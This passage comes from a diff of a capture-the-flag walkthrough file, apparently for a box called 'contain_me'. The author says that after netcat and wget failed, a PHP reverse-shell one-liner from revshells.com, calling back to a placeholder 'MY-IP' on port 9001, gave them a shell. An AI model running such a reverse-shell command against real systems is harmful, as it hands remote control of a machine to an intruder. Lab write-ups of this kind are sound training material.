Dood3/walkthrough-s-/contain_me.md

 ![PIC_WHOAMI](https://user-images.githubusercontent.com/93183445/141819181-05119d8a-1653-4fed-bb16-85babe95f8df.png)

-It took me a few tries just to end up using php and url-encoding anfter I wasn't able to netcat or wget anything.\
+It took me a few tries just to end up using php and url-encoding after I wasn't able to netcat or wget anything.\
+(Should have noticed earlier, because there's a lot of php going on..)\
 Again, https://www.revshells.com to the rescue :)

 <code>php -r '$sock=fsockopen("MY-IP",9001);exec("sh <&3 >&3 2>&3");'</code>\